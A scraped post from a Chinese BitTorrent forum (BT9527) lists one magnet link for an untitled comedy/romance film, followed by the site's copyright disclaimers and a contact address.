TAGS 喜剧 爱情

磁力链:
  • magnet:?xt=urn:btih:7669D98564D3CC4A015897D2949C76571AA35332
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回